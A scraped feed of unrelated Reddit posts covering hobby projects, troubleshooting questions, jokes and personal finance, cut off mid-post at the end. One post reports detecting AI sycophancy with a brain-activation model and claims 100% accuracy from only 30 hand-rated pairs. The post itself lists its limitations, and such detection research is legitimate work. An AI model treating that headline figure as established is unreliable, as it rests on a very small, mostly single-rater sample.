Background: InfoSec / automation engineering. Been using AI seriously for about two months when I started this. Not a vibe coder — I wanted to understand what I was building.

The problem: finding 40+ acres of rural Minnesota land under $150K, against 10 hard criteria (flood zone, hospital proximity, mining distance, fiber, buildability, etc.) across 21 counties without missing anything.

What I built with Claude Code:

- Python / FastMCP server with 7 tools

- SQLite for persistence + deduplication

- Zillow + LandWatch scraping via httpx + BeautifulSoup

- n8n workflow for scheduled daily runs

- Dockerized, connects to Claude or any MCP-compatible client

Claude Code wrote most of the Python. I steered, pushed back, caught bad output, and made the architecture calls. The thing I keep coming back to: an MCP server isn't static code — it gets smarter as the model using it gets smarter. I stumbled into that decision but it turned out to be the right call.

First run: 49 raw listings → 29 unique filtered parcels. Including a $44,900 / 40-acre listing in Crow Wing County that I still need to figure out what's wrong with.

Full write-up: https://biuiw.hashnode.dev/from-zero-to-mcp-server-how-i-automated-my-minnesota-land-search

Open source: https://github.com/lowcoordination/mcp-mn-land

r/Jokes Main_Newt3686

I survived a fall without a parachute...

I've also survived a winter, spring and summer without one, too.

r/comfyui Senpai404

Problem with AMD WIndows portable edition

Hello everyone,
I wanted to try ComfyUI, so I downloaded the latest AMD-specific package. After extracting it, I ran the file “run_amd_gpu.bat” but I get this error:

E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable>.\python_embeded\python.exe -s ComfyUI\main.py --windows-standalone-build

comfy-aimdo failed to load: Could not find module 'E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Lib\site-packages\comfy_aimdo\aimdo.dll' (or one of its dependencies). Try using the full path with constructor syntax.

NOTE: comfy-aimdo is currently only support for Nvidia GPUs

Fatal error in launcher: Unable to create process using '"D:\a\ComfyUI\python_embeded\python.exe" "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Scripts\offload-arch.exe" ': Impossibile trovare il file specificato.

[WARNING] offload-arch failed with return code 1

[stderr]

Windows fatal exception: access violation

Stack (most recent call first):

File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Lib\site-packages\torch\cuda\__init__.py", line 182 in is_available

File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Lib\site-packages\comfy_kitchen\backends\cuda\__init__.py", line 639 in _register

File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Lib\site-packages\comfy_kitchen\backends\cuda\__init__.py", line 650 in

File "", line 488 in _call_with_frames_removed

File "", line 999 in exec_module

File "", line 935 in _load_unlocked

File "", line 1331 in _find_and_load_unlocked

File "", line 1360 in _find_and_load

File "", line 488 in _call_with_frames_removed

File "", line 1415 in _handle_fromlist

File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\python_embeded\Lib\site-packages\comfy_kitchen\__init__.py", line 3 in

File "", line 488 in _call_with_frames_removed

File "", line 999 in exec_module

File "", line 935 in _load_unlocked

File "", line 1331 in _find_and_load_unlocked

File "", line 1360 in _find_and_load

File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\ComfyUI\comfy\quant_ops.py", line 5 in

File "", line 488 in _call_with_frames_removed

File "", line 999 in exec_module

File "", line 935 in _load_unlocked

File "", line 1331 in _find_and_load_unlocked

File "", line 1360 in _find_and_load

File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\ComfyUI\comfy\memory_management.py", line 8 in

File "", line 488 in _call_with_frames_removed

File "", line 999 in exec_module

File "", line 935 in _load_unlocked

File "", line 1331 in _find_and_load_unlocked

File "", line 1360 in _find_and_load

File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\ComfyUI\comfy\utils.py", line 25 in

File "", line 488 in _call_with_frames_removed

File "", line 999 in exec_module

File "", line 935 in _load_unlocked

File "", line 1331 in _find_and_load_unlocked

File "", line 1360 in _find_and_load

File "E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable\ComfyUI\main.py", line 194 in

E:\ComfyUI_windows_portable_amd\ComfyUI_windows_portable>pause

Premere un tasto per continuare . . .

It seems to me that the issue is “comfy_kitchen,” which tries to load CUDA, but since I have an AMD GPU it fails. Why is this component included in the AMD GPU version? How can I fix this?

r/LocalLLaMA Oatilis

A technical, 100% local writeup on how I replicated and then surpassed the Secret Detection model from Wiz (and the challenges along the way) - including labeling an entire dataset with local AI

Hey everybody, I have a strong interest in offloading work to small, specialized models that I can parallelize - this lets me scale work significantly (plus, I am less dependent on proprietary APIs)

Some time ago, I saw a blog post from Wiz about fine-tuning Llama 3.2-1B for secret detection in code. They got 86% Precision and 82% Recall. I wanted to see if I can replicate (or beat) those numbers using purely local AI and produce a local specialized model.

After a couple of weekends of trying it out I managed to get a Llama 3.2-1B hitting 88% Precision and 84.4% Recall simultaneously!

I also benchmarked Qwen 3.5-2B and 4B - expectedly, they outperformed Llama 1B at the cost of more VRAM and longer inference time.

I’ve put together a full write-up with the training stats, examples, and a step-by-step breakdown of what I went through to hit these metrics. Warning: It's technical and pretty long, but I honestly think it's fun to read.

Here are some highlights:

  • I only sourced publicly available data. This wasn't enough so I used procedural generation to augment and improve my dataset. Labeling was done locally using Qwen3-Coder-Next (sorry Claude, you sit this one out).
  • Instead of just finding secrets, I trained the models to output structured JSON. Initially, every vanilla SLM I tested (Llama & Qwen) scored 0% on schema compliance, but I got them to 98-100% after training.
  • I made a somewhat embarresing mistake including a high entropy class which was detrimental to training, but I caught it and removed it eventually.
  • I discovered 4,500 of my "negative" samples actually contained real-world passwords (even though they don't seem real!). The model was literally being trained to ignore secrets. At this point I was already clearing the metrics set by Wiz, but fixing this improved the recall on passwords.

Would love to hear if anyone else is pursuing efficient 1B/3B finetunes for specialized tasks and about your stack!

AI Disclaimer: I write everything myself - this post, and the full writeup. Please point out any typos!

r/StableDiffusion Complete-Box-3030

Any fast workflow for ltx 2.3 ,image 2 video

r/whatisit Direct-Web3712

Weird sound coming from my vent. Sounds like a bird and or a mouse squeaking along with creaking.

please let me know what this is. its been off and on for an hour! I dont have an infestation so Im thinking it has something to do with my upstairs neighbors. thanks guys!

r/ProgrammerHumor gfcf14

style

r/ClaudeAI KevinRaynor90

How to best curate a historical data set generated by Claude

I've been building an online map tool for learning history in a visual way (showing connections where relevant, and placing it in context geographically). I think it's a potential great idea for getting more people, including myself, more into history; especially if they're more visual leaners. It's online at: https://visualworldhistory.com/

One thing I'm struggling with however is that I've used Claude to generate the content where I'm trying hardest to ensure it's accurate, but I'm not a 100% sure whether this is the right approach. Anything I might add to help ensure accuracy?

My current steps:

  1. Run Opus and generate a master list of global events (with lat/lon and importance) and have it verify this afterwards.
  2. Then use the masterlist to generate detail data that contains summaries following a certain template, where it cross-checks whether any of these have related events.
  3. Then I set up a history curator agent that runs Opus at heavier effort to go over all detail events and check for historical inaccuracies. This seems to do a good job, but also uses a lot of tokens so I'd ideally like to re-run this several times, but hard to reason whether that's worth doing.

Anything I might be missing in the process? Or a way to more accurately curate these events that doesn't just involve a parallel curator set up?

r/whatisit SunPossible6793

Connecticut added a ton of highway cameras. What’s this box attached to the poles?

r/ClaudeCode llIIIIIIIIIIIIIIIIlI

“I said hi [nb: in the middle of peak usage hours, loaded 200 skills, 25k line MCPs and sacrificed a mutant crocodile in the process], now my weekly limit is gone”

YES THEY’RE BEING ODD ABOUT THE LIMITS BUT FELLAS COME ON

r/mildlyinteresting ehedfdgfdfg

This sign says "Gurple" instead of purple

r/todayilearned BusinessAlive3486

TIL in some countries people race each other on the back of ostriches. They are ridden in the same way as horses with special saddles, reins, and bits. However, they are harder to manage than horses. The practice is common in Africa.

r/AI_Agents Secure_Bit_2321

Wanting to get into AI agent dev but completely lost - where do you even start in 2026?

Problem is I have zero clue where to start. Every time I Google it I get 10 different answers - some say start with n8n, some say LangGraph, some say just use raw API calls, some say CrewAI, AutoGen... it's overwhelming.

A few honest questions:

- Should I start with a no-code/low-code tool like n8n to understand the concepts, then move to code-first frameworks?

- Or is n8n just a detour and I should go straight to LangGraph / LlamaIndex?

- Is LangGraph overkill for a beginner or is it the right place to invest time?

- What's the actual skill progression that made you good at this?

I don't mind putting in the work - I just don't want to spend 3 months on the wrong thing. If you've gone from zero to building real agentic systems, I'd love to hear your actual path.

Thanks in advance 🙏

r/n8n Significant-Bid-8482

How do I properly import workflows into a new n8n instance?

I’m migrating to a new n8n instance and want to move my existing workflows.

What’s the best way to do this?
– Export/import JSON manually?
– Copy database?
– Any gotchas with credentials or environment variables?

I tried importing via JSON but ran into issues with credentials not linking correctly.

Any recommended approach?

r/LocalLLaMA Spiritual_Guide6862

I used Meta's TRIBE v2 brain model to detect AI sycophancy — 100% accuracy with zero training

https://preview.redd.it/22o5rdjeoktg1.png?width=4104&format=png&auto=webp&s=a15e280282842bfc00adfa42c85a8595231e8685

TL;DR: Used Meta's TRIBE v2 (brain foundation model) to predict neural activations from AI responses, mapped them to 5 cognitive dimensions, and tested whether these could discriminate response quality. Sycophancy detection: 100% accuracy with no labels, no training. --- **Motivation** Standard RLHF compresses human judgment into a single binary bit (A > B). This loses the *reason* for preference. A response can look fluent, confident, and helpful — and still be sycophantic. Text-based reward models struggle with this because sycophantic text and honest text look similar on the surface. Neuroscience has a different angle: the brain processes sycophancy vs honesty differently at the network level. The Ventral Attention Network activates when something seems wrong. The Default Mode Network drives deep semantic processing. These are independent axes. **Method** 4-model pipeline: 1. LLaMA 3.2 3B → text embeddings 2. Wav2Vec-BERT → prosody features (via TTS simulation) 3. TRIBE v2 → predicted fMRI activations (20,484 fsaverage5 vertices) 4. CalibrationMLP → 5 cognitive dimension scores Schaefer 2018 atlas maps activations to networks: - Comprehension = Default A + B parcels - Memory = Limbic - Attention = Frontoparietal + Dorsal Attention - Confusion = Ventral Attention (error detection) - DMN Suppression = negative Default C (engagement proxy) Tested on 30 hand-rated prompt-response pairs across 6 categories. **Results** | Category | Brain-as-Judge Accuracy | |---|---| | Sycophancy | 100% | | Clarity | 100% | | Depth | 80% | | Coherence | 60% | | Factual accuracy | 20% | | Mixed | 60% | | **Overall** | **70%** | The failure on factual accuracy is expected and informative: the brain model predicts *perception* , not *ground truth* . A fluent false statement activates comprehension just as well as a fluent true one. The two key dimensions — Comprehension (effect size d=1.35) and Confusion (d=2.11) — are nearly uncorrelated (r=-0.14), suggesting they capture independent quality axes. **Limitations** - n=30 pairs, single rater for most categories - 3 min/text inference time (vs 50ms for ArmoRM) - Augmented logistic regression showed no improvement over baseline at n=30 (majority class problem) - Text-only pathway — trimodal TRIBE input (text+audio+image) would likely perform better **Code + full writeup** : https://github.com/morady0213/tribe-experimentscc | [https://medium.com/@mohamedrady398/the-ai-agrees-with-everything-you-say-a-brain-model-caught-it-every-time-5b717488071d] Happy to answer questions on methodology, the TRIBE model, or the ROI mapping approach. 

https://preview.redd.it/qye9l8ksoktg1.png?width=4042&format=png&auto=webp&s=26eda7dc4fff24b62967e4c7446c88fce530cf14

r/Seattle SpiritualSomewhere

Who is the best Seattle-based influencer, and who is the worst?

Wondering what folks thoughts are.

Imo: Corteezyy is the best. Most, if not all, good-based influencers are the worst (george.pnw, seattle.food.diva, etc.)

r/arduino Fine-Camel1304

Need ideas

I am doing a school project that involves software. I didn't want to do ai slop websites, so since I have some cad skills and know how to use 3d printers I wanted to do a project using arduinos. But I can't figure out what to make. I need some suggestions (something useful or very interesting, the project said no 'toys' not sure what 'toy' includes but I need real project worthy ideas). I was thinking about a hud but after some research it seems too hard.

r/arduino McLovin123459

External power using adapter

I recently have a project that uses 3 stepper motors, lcd, and a numpad. With the arduino mega, I was informed that I needed to have an external source of power to sustain all of the components to avoid frying the board itself. My question is, how do I achieve that? I bought a 5v3a adapter to serve as a external power instead of batteries but I am not aware on how to use it since I only directly use the power pins (5V,GND) on the boards itself in my old projects. The stepper motor is 28BYJ-48, and the lcd is a 16x2.

r/aivideo Brossness

The best crab

r/Seattle apocalypse_meow_

The mountain from Discovery park yesterday

r/TwoSentenceHorror Fill-in-the____

The boy didn’t come out of the cornfield after he was dared to spend the night in it.

After a search was organized, most of him was found in the tank of the combine.

r/ClaudeAI patrona_halil

Pasting a text to cladue website version

Hi, I am not a software person but I am trying to research about something and I have a long prompt (around 7500 characters) when I paste it to claude it takes it as an attachement and when I hit it it start to think by saying that prompt is empty. Why does this happens and how can I fix it ?

Basically I am uploading a pdf and a detailed prompt about my research

https://preview.redd.it/of1nx85t0ltg1.png?width=1464&format=png&auto=webp&s=842941b1bd05f1d2068d41f15622abc56a29ec37

As in the screenshot it accepts the prompt as an attachment "PASTED"

r/PhotoshopRequest Just-Shoot-Me

I need this converted to JPEG

It’s a .heic image and I need it converted and literally don’t know how. I will pay $5. I have venmo.

r/funny _zack_x2-plus-ary

Not a mockery, just something I had, pt.2

r/whatisit Pentavious-Jackson

Weird substance leaching from plant

Weird substance leaching into the water from a succulent plant I received as a gift today. Put in water to water from below and came back to find this…

ETA: Like I said in my original caption, this was a gift. I didn’t buy this and wouldn’t have purchased a plant that was packaged this way. I’m watering it from below, which I’ve always had success with. The plant isn’t being kept in water. I’m simply curious what could be leaching into the water.

I do plan to repot in succulent soil and a proper container, without the glued down rocks 😂. I appreciate the concern for the plant, but I can promise you I won’t be abusing it.

r/ClaudeAI Ill_Design8911

Built a task scheduler panel/mcp for Claude Code

I was running OpenClaw before as a persistent bot and the heartbeat/scheduled tasks were eating tokens mindlessly. Every 30 min it'd spin up the full LLM just to check what's due and say "HEARTBEAT". No control, no visibility, no logs.

But now I move to CC due the recent OpenClaw ban while also OC felt bloated, So I built Echo Panel a task scheduler that sits alongside Claude Code currently runs on an Ubuntu VPS built using Claude Code Channels and tmux.

The problem:

- Heartbeat tasks ran through the main agent, consuming context and tokens

- No way to see what ran, what failed, or how much it cost

- Scheduling was done in a markdown file that the LLM had to parse (and got wrong)

- No separation between tasks that need the main agent vs ones that don't

The solution:

  1. Agent → you

"Run a security sweep every day at 6AM. Check SSH logs, open ports, disk space, SSL certs. If something's wrong, tell me on Telegram."

Agent spawns, runs bash commands, sends you the report, dies. Main agent never involved.

  1. Agent → agent

"Every morning at 9AM, check my calendar and find one interesting AI headline from X."

Agent spawns, gathers the info, passes it to the main agent. Main agent turns it into a casual morning brief with personality and sends it to you when the timing is right.

  1. Reminder

"Remind me to check on the car booking tomorrow at 9AM."

No agent spawns. At 9AM a message appears in the main agent's inbox: "John needs to check his car booking." Main agent texts you about it. Zero tokens used for the scheduling part.

How it all connects:

The panel comes with an MCP server (11 tools) so Claude can manage everything conversationally. Say "remind me to call the bank at 2pm" and it creates the task, syncs the cron, done. No UI needed, but it's there if you want it.

Tools: add/list/toggle/run/delete/update for both panel tasks and system crons.

It also manages your existing system crons (backups, health checks, whatever) from the same UI. Toggle them, edit schedules, trigger manually, see output history.

Happy to open-source if there's interest.

https://preview.redd.it/9oxh8soynktg1.png?width=2145&format=png&auto=webp&s=2cf0bd5305ec6f2b718f21f3f0c96a5506fa3a54

https://preview.redd.it/s4s7i3i4oktg1.png?width=1250&format=png&auto=webp&s=c40ab92444669f7748ce9348c6d6a898d4f91545

r/KlingAI_Videos lightscribe

Dinosaur reacting to self in mirror.

r/personalfinance Rampant_Poverty_2026

resources 4 financial literacy?

any good articles, videos, docs to read to learn/improve/apply financial literacy, would be appreciated.

Thanks.

r/personalfinance Exciting-Purple-1334

Credit dropped from almost 600 to 457 after student loans — trying to recover fast

Hey everyone, I could really use some advice.

My credit score was almost 600, and then it dropped about 120 points after my student loans hit my report. I’m now sitting at 457 and trying to fix this as quickly and smartly as possible.

Here’s my situation:

Debt / Credit:

  • Multiple collections accounts
    • Lowest: $134 and $326
    • Others are higher (some over $500)
  • Several closed accounts with late payments
  • Student loans around $6,000 (not on a payment plan yet)

Income:

  • I make about $3,300–$4,000/month (commission-based)

Monthly expenses:

  • Around $1,300 total (rent, car insurance, phone, gas, groceries, small cushion)
  • Leaves me with about $1,500/month I can put toward fixing my credit

What I’m doing so far:

  • Planning to pay off the $134 collection this weekend
  • Contacting all collections first to ask for pay-for-delete (and getting it in writing before paying)
  • Considering settlements for larger debts if they won’t delete
  • Planning to set up a payment plan for student loans ASAP
  • Looking into disputing anything inaccurate

Goals:

  • Get back into the 600s this year
  • Buy a home in 2–3 years

Questions:

  1. Should I do anything with the closed accounts, or just focus on collections?
  2. Is it better to settle larger collections or hold out for pay-for-delete only?
  3. For student loans:
    • Can they ever be removed once I start paying?
    • Or is it just about getting them into good standing?
  4. Should I be disputing while also trying pay-for-delete, or handle one first?
  5. I’m debating financing a car soon since mine isn’t doing great — would that hurt me right now?

I finally feel like I’m in a position to fix this with steady income, I just want to make the right moves and not mess it up.

Any advice or experiences would really help 🙏

r/StableDiffusion robertpalmsss

Ltx2.3 Make uncensored videos

Hi, I downloaded ltx2.3 on Comfy on my PC. I like it, it's fast, and the quality is decent. But I can't make hot videos.

Can someone explain this to me?

Or give me links where they explain the workflow well?

Thanks!!

r/whatisit wavesembrace_96

What’s this in car door ?

r/artificial emprendedorjoven

I built an AI content engine that turns one piece of content into posts for 9 platforms — fully automated with n8n

What it does:

You give it any input — a blog URL, a YouTube video, raw text, or just a topic — and it generates optimized posts for 9 platforms at once: Instagram, Twitter/X, LinkedIn, Facebook, TikTok, Reddit, Pinterest, Twitter threads, and email newsletters.

Each output is tailored to the platform (hashtags for IG, hooks for TikTok, professional tone for LinkedIn, etc.). It also auto-generates images for visual platforms like Instagram, Facebook, and Pinterest,using AI.

Other features:

- Topic Research — scans Google, Reddit, YouTube, and news sources, then uses an LLM to identify trending subtopics before generating content

- Auto-Discover — if you don't even have a topic, it searches what's trending right now (optionally filtered by niche) and picks the hottest one

- Cinematic Ad — upload any photo, pick a style (cinematic, luxury, neon, retro, minimal, natural), and Gemini transforms it into a professional-looking ad

- Multi-LLM support — works with Mistral, Groq, OpenAI, Anthropic, and Gemini

- History — every generation is saved, exportable as CSV

The n8n automation (this is where it gets fun):

I connected the whole thing to an n8n workflow so it runs on autopilot:

1. Schedule Trigger — fires daily (or whatever frequency)

2. Google Sheets — reads a row with a topic (or "auto" to let AI pick a trending topic)

3. HTTP Request — hits my /api/auto-generate endpoint, which auto-detects the input type (URL, YouTube link, topic, or "auto") and generates everything

4. Code node — parses the response and extracts each platform's content

5. Google Drive — uploads generated images

6. Update Sheets — marks the row as done with status and links

The API handles niche filtering too — so if my sheet says the topic is "auto" and the niche column says "AI", it'll specifically find trending AI topics instead of random viral stuff.

Error handling: HTTP Request has retry on fail (2 retries), error outputs route to a separate branch that marks the sheet row as "failed" with the error message, and a global error workflow emails me if anything breaks.

Tech stack:

- FastAPI backend, vanilla JS frontend

- Hosted on Railway

- Google Gemini for image generation and cinematic ads

- HuggingFace FLUX.1 for platform images

- SerpAPI + Reddit + YouTube + NewsAPI for research

- SQLite for history

- n8n for workflow automation

It's not perfect yet — rate limits on free tiers are real — but it's been saving me hours every week. Happy to answer questions.

https://preview.redd.it/f8d3ogk3nktg1.png?width=888&format=png&auto=webp&s=dcd3d5e90facd54314f40e799b32cab979dae4bf

https://preview.redd.it/j8zl07llmktg1.png?width=946&format=png&auto=webp&s=5c78c12a223d6357cccaed59371e97d5fe4787f5

https://preview.redd.it/5cjas6hkmktg1.png?width=891&format=png&auto=webp&s=288c6964061f531af63fb9717652bececfb63072

https://preview.redd.it/k7e89belmktg1.png?width=1057&format=png&auto=webp&s=8b6cb15cfa267d90a697ba03aed848166976d921

https://preview.redd.it/3w3l70tlmktg1.png?width=1794&format=png&auto=webp&s=6de10434f588b1bf16ae02f542afd770eaa23c3f

https://preview.redd.it/a40rh1canktg1.png?width=1920&format=png&auto=webp&s=1d2414c7e653a5f01f12a21a43e69bd4fb4b99ed

r/SideProject Ok_View_3672

Kids AI Bedtime Story Generator App

Hi everybody. I've created Mopsy's Bedtime Tales - a kids bedtime story generator, using AI.

https://apps.apple.com/.../mopsys-bedtime-tales/id6757112507

I would love for people to try it out and give any feedback

Free for 5 stories... feel free to message for 50% discount codes for premium access.

r/LocalLLaMA Vivid-Usual237

Running on-device LLM in Unity Android — 523s → 9s with llama.cpp + Adreno OpenCL (79x speedup)

Been building a roguelike RPG where an on-device LLM generates dungeon content every 5 floors — mob names, dialogue, boss patterns — no server, fully offline.

The journey to get usable inference speed was rough:

Approach tok/s Notes ONNX Runtime CPU 0.21 523s per generation ONNX + QNN HTP 0.31 3/363 nodes on NPU (INT4 unsupported) LiteRT-LM GPU — Unity renderer killed available VRAM llama.cpp Adreno OpenCL 16.6 9s per generation

Final stack: Qwen3-1.7B Q8_0 (1.8GB) + llama.cpp OpenCL on Snapdragon 8 Gen 3.

One counterintuitive finding: on Adreno OpenCL, Q8_0 is faster than Q4_0. Lower quantization introduces dequantization overhead on the GPU that actually slows things down.

Unity integration needed a C wrapper (unity_bridge.c) — direct P/Invoke of llama.h structs causes SIGSEGV due to layout mismatch.

r/ChatGPT Ok-Fun-8242

Bruh 💀

r/ChatGPT binaryatlas1978

looking for guidance on workflows with files

looking for some guidance on some workflows i am trying to recreate in chatgpt that are not working. Has to do with processing lots of files. I used to use claude cowork. It would take a bunch of photos on my local computer and process those photos extracting info. I had to stop using it because of use limits would drain my account and i couldn't use it for 5 hours. I got a business sub with gpt but i do not see a way to do this with it. It will not process in a folder on my computer and i am limited to 40 files on an upload. I tried the google drive and i connected and gave it the url to the folder but still will not just read the files in the folder. Has anyone got something like this to work or can give me some pointers on this? I was thinking maybe codex?

r/ClaudeAI alexdoo

Need help with creating an agent to seek grants for my non-profit.

Simply put, I'm trying to create an agent via Claude to seek relevant grant opportunities for my non profit. I tried setting one up by just talking to it, but I'm getting similar results to ChatGPT (basically suggesting grants I already know about). I'd like for it to run a search every time I ask it to. If I can automate the search then that would be better, but I'll take what I can get.

I am using a paid individual account.

r/ClaudeAI Mental_Passion_9583

Claude Code on Desktop X CLI

Yo what's good, just started running Claude Code for my dev work, on the PRO plan rn. Today I went down a rabbit hole and got some questions bout the CLI side of things. Does rolling with the CLI give you any edge over the desktop app? What am I missing out on by not using it? Drop your experience and what you'd recommend, fam.

r/Jokes Upstate_Gooner_1972

My family tree:

Great-grandparents: 4 children

Grandparents: 2 children

Parents: 1 child

Me: 1 cat

Cat: neutered

r/LocalLLaMA x0wl

I made a small app to use Copilot Chat with LM Studio instead of Ollama.

I found out that VSCode's built-in Copilot Chat can work with local models, but requires Ollama. I don't use Ollama because I like LM Studio.

I looked at its source code and found that is only uses Ollama-specific APIs to discover available models, but then it just relies on OpenAI-compatible endpoints. So I implemented a small server that emulates enough of Ollama's API for Copilot to work by making use of LM Studio's REST API.

The GitHub Link is here: https://github.com/x0wllaar/copilot-ollama-proxy, there's a prebuilt JS file that you can use with Node/Bun in the releases section.

Maybe someone else will find it useful.

r/photoshop DIIVVES

Raw crop help (raw file auto cropping)

Hi, I’m experiencing a new phenomenon that I didn’t experience before basically when I’m out photographing and I’m shooting focused layers to get stacked I shoot in JPEG plus raw and my JPEG settings are 16 x 19 panoramic the issue I’m having is that when I open up the raw files and Photoshop. They are cropped as well matching the JPEG which I don’t want. Is there a way to uncrop my raw files seems strange.

r/blackmagicfuckery justalildropofpoison

Faster than lightning

r/painting silviaaivlisi

Oil Painting on Canvas: "Masks"

r/funny frankandtank2912

Apparently I wasn't driving fast enough for him

r/mildlyinteresting Swooferfan

This bottle of olive oil has spots on the bottle walls

r/ClaudeAI Agenexus

Built with Claude API: Give your agent SKILL.md and it handles the rest — Agenexus

I built Agenexus because I kept hitting the same wall: multi-agent systems require knowing your agents in advance. Every collaboration is hardcoded. There's no way for an agent to find a collaborator that wasn't pre-wired to work with.

Claude API is the core of how it works:

  • Claude evaluates capability challenges to verify that agents are real and can do what they claim
  • Claude powers the semantic matching between agents based on their SKILL.md profiles
  • Each agent in a collaboration gets its own Claude-powered instance with its own conversation history

How I built it: Next.js frontend, Supabase for the database, Voyage AI for embeddings, Claude API for intelligence. The hardest part was designing the agent-native onboarding — no forms, no UI, just a markdown file the agent reads and follows autonomously.

Why agent-native: I wanted to build something where humans are optional. No human accounts exist on the platform. Agents register themselves, complete challenges, get matched, and collaborate. Humans just watch.

Free to try: give your agent agenexus.ai/skill.md and it handles the rest.

r/Rag hira_thakur_ki_kheer

RAG vs Fine-tuning for business AI - when does each actually make sense? (non-technical breakdown)

I've been helping a few small businesses set up AI knowledge systems and I keep getting asked the same question: "should we fine-tune a model or use RAG?"

Here's my simplified breakdown for non-ML founders:

RAG (Retrieval-Augmented Generation)
- Best when: your data changes frequently (SOPs, policies, product catalogs)
- Lower cost to maintain
- You can update the knowledge base without retraining
- Response quality depends on how well you chunk/embed your docs
- Great for: internal knowledge bots, customer support, HR Q&A

Fine-tuning
- Best when: you want a specific style/tone/format of response
- One-time training cost + periodic retraining cost
- Doesn't keep up with new info unless you retrain
- Great for: copywriting assistants, code assistants with your own patterns

For 90% of businesses, RAG is the right starting point. We've built RAG systems for a logistics company and a coaching brand both saw support ticket volume drop by ~35% within 3 months.

Curious what's your use case? Happy to help people think through the architecture.

r/personalfinance ResponsibleFinger782

Best HYSA for beginners?

Hey yall! I have about $8,500 that i’ve saved up since high school, all babysitting, birthday, and allowance money. I’m currently 19 looking to put that into a HYSA but I dont know which one would be the best for me. I want to get as much interest as possible, if anyone has any recommendations it would be much appreciated :)

r/whatisit shootermac32

Found a massive egg this morning on a walk.

I’m trying to figure out which bird it belongs to? It was next to a pond, it’s about 2-3 times the size of a chicken egg. I didn’t have a banana on hand for reference so here’s my hand for reference. We have geese, turkeys and duck in the area.

r/whatisit yackyackyack_

Found this unexplained pile of dirt (?) in my room

Basically what the title says. I live in an apartment building in the upper Midwest, if that's relevant to any pests it could be specially. There is an ant problem currently but they are very small, not large like carpenter ants. Any suggestions and recommendations for how to proceed would be helpful! I am definitely willing to pass this issue on to maintenance if I can but I dont trust theyll take it seriously unless I have a clue what is causing it.

r/LocalLLM pyrotecnix

Im just starting in local llm using a Strix Halo

My question is how should I setup this server so I can have a thinking model and multiple agents performing tasks. I utilize vscode but just getting my feet wet with local as I have been using frontier models mostly.

Currently have the server set to pass all available ram to gpu on the chip and have lemonade running lama.cpp but need some guidance.

Im not sure which extension for vscode and which models I should provide through my local server. When I set it up before. It would crash due to waiting for the other models to load via cline. Thinking about using opencode but so many options its hard to get started.

Models I tried were qwen based. I would prefer vulcan as I heard there were issues using mroc at the moment.

r/LocalLLM shhdwi

Nanonets OCR-3: 35B (A3B active) MoE model scoring 93.1 on olmOCR beats GPT-5.4 and Gemini on document parsing, but it's API-only (not local)

Putting this here because a lot of people in this sub are processing documents locally Paperless-ngx, Tesseract pipelines, Surya, marker, etc. and the benchmark comparison is relevant even if the model itself isn't self-hostable.

Nanonets just released OCR-3. Quick specs:

  • 35B total parameters, A3B active (Mixture-of-Experts)
  • 93.1 on olmOCR benchmark (GPT-5.4 gets 81.0, Gemini 3.1 Pro gets 79.6)
  • 90.5 on OmniDocBench
  • Proprietary, API-only: not open weights

The architecture is interesting even if you can't run it locally. It's an MoE that only activates 2–3 expert sub-networks per token, so inference is 2x faster than a dense model of equivalent quality. They trained 75% on low-res images because document structure (tables, headers, columns) can be learned without full pixel detail. Only 25% of training used full resolution for character-level accuracy. At inference, token count caps at 1280 per image — predictable cost per request.

Where it actually outperforms the models you can run locally:

Tables are the biggest gap. OCR-3 scores 94.2 on the tables category vs GPT-5.4 at 91.1. It outputs simple tables as markdown pipes and complex tables (merged cells, colspan/rowspan, nested) as HTML — doesn't try to flatten everything.

Multi-column layouts: 87.6 vs GPT-5.4 at 83.7. Reading order stays correct on two-column court filings, academic papers, etc.

Old degraded scans: 49.6, still bad, but GPT-5.4 gets 43.9. Nobody's cracked this well yet.

Features that local pipelines don't have (yet):

  • Confidence scores on every extracted element. You can route by certainty — >90% to DB, 60–90% to a second model, <60% to human review.
  • Bounding boxes on every element. Trace any value back to exact page coordinates.
  • Five endpoints from one model: parse, extract (schema-based), split (classify documents), chunk (RAG-optimized), VQA.

The honest tradeoff: it's not local and but you get 10K pages for free. If you need privacy, air-gapped processing, or zero API costs, this doesn't work for you. But if you're already calling any external API in your document pipeline and accuracy matters more than self-hosting, the benchmarks speak for themselves.

They also found something worth knowing about olmOCR: 437 of 864 "failed" tests were evaluator brittleness, not actual model errors. After correction, the weighted average goes from 87.4 to 93.1. If you're benchmarking local models on olmOCR, that evaluator noise might be affecting your numbers too.

Research page: https://nanonets.com/research/nanonets-ocr-3

For people running local OCR — what's your current stack and where does it fall apart? Curious how Surya/marker/Tesseract compare on the same edge cases (merged tables, multi-column, degraded scans).

r/me_irl Stock_Crazy6759

me_irl

r/photoshop ImmediateTeach7563

Shirt Design help

I am trying to draft a design for a shir that I want customized could someone somehow help me turn these images into a design ? To put on a graphic tee front and back . I need it to be 2 separate shirts

r/Jokes UnicornsForBreakfass

What do you call two crackheads on one phone line?

a little insight to my life my fil and mil is struggling with drug addiction to Crack and on the days they are broke they are calling my phone with the craziest stories to get me to give them money. which I know for what it's for. so to make me feel better this question popped into my head but I don't have anything to answer it with that would make it funnier so I'm here asking you guys. Just humor me please.

r/whatisit thxbutno

what is this on my plate?

i was eating rice, salad and chicken

r/painting breanmayer16

Painted a cool background that I won’t keep.

Did this cool thing in the background. I won’t keep it because it doesn’t match the figure but I thought it was cool.

r/personalfinance Seabee1965

Opinions On Ameriprise Please

I am looking to dump my Ameriprise Financial Advisor after about 10-years as their fee structure is both high, and complex when trying to figure out exactly how much you are paying in fees both annually and monthly. Full disclosure - I am not blaming my FA, he has recommended high fee, high commission products to us over the years and I said "yes" because I trusted his advice. After a month of really educating myself and trying to understand Ameriprise's fee structure, I now know he placed us in products that certainly benefitted him and have really ate away at our total portfolio RofR. On another note, I am definitely dumping the VUL policies. Here is my current portfolio, performance and fees:

Total portfolio value today in $511K

Been with them since 1989

Wife and I annual gross income $325,000

VUL 5

